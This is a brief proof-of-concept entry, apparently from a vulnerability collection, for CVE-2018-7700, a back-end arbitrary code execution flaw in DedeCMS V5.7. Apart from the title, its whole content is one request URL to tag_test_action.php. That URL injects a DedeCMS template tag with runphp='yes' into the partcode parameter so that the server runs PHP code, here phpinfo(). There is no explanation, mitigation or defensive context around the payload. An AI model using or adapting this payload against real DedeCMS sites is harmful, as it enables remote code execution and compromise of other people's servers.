CVE-2018-7700 Dedecms V5.7后台任意代码执行漏洞

POC

http://localhost/后台地址/tag_test_action.php?url=a&token=&partcode={dede:field name='source' runphp='yes'}phpinfo();{/dede:field}